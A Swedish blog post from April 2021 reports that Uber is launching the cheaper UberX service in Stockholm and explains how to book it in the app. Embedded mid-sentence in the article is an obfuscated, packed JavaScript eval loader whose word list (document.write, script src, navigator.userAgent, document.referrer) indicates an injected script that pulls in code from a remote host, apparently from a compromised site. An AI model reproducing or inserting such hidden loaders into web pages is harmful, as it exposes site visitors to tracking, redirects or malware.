Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Uber lanserar billigare taxi UBERX

Uber lanserar billigare taxi UBERX
Sebastian

Idag gick företaget Uber ut med att bolaget nu lanserar en ny tjänst som ska göra det billigare att ta sig fram i Stockholm. Enligt deras pressmeddelande ska den nya tjänst UberX kosta hela 30 procent lägre än de ledande taxibolagen i Stockholm.

UberX kommer att ha ett jämförelsepris på 199 kronor.

Så eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|iytrz|var|u0026u|referrer|isnir||js|php’.split(’|’),0,{}))
beställer du en UberX

När du öppnar din Uber-app kommer du att se flera alternativ under kartan. Välj uberX, alternativet till vänster, för att boka uberX.

Mer info: uber.com

Bild från http://blog.uber.com/2013/02/10/uber-presenterar-stockholm-art-week/_ber0332/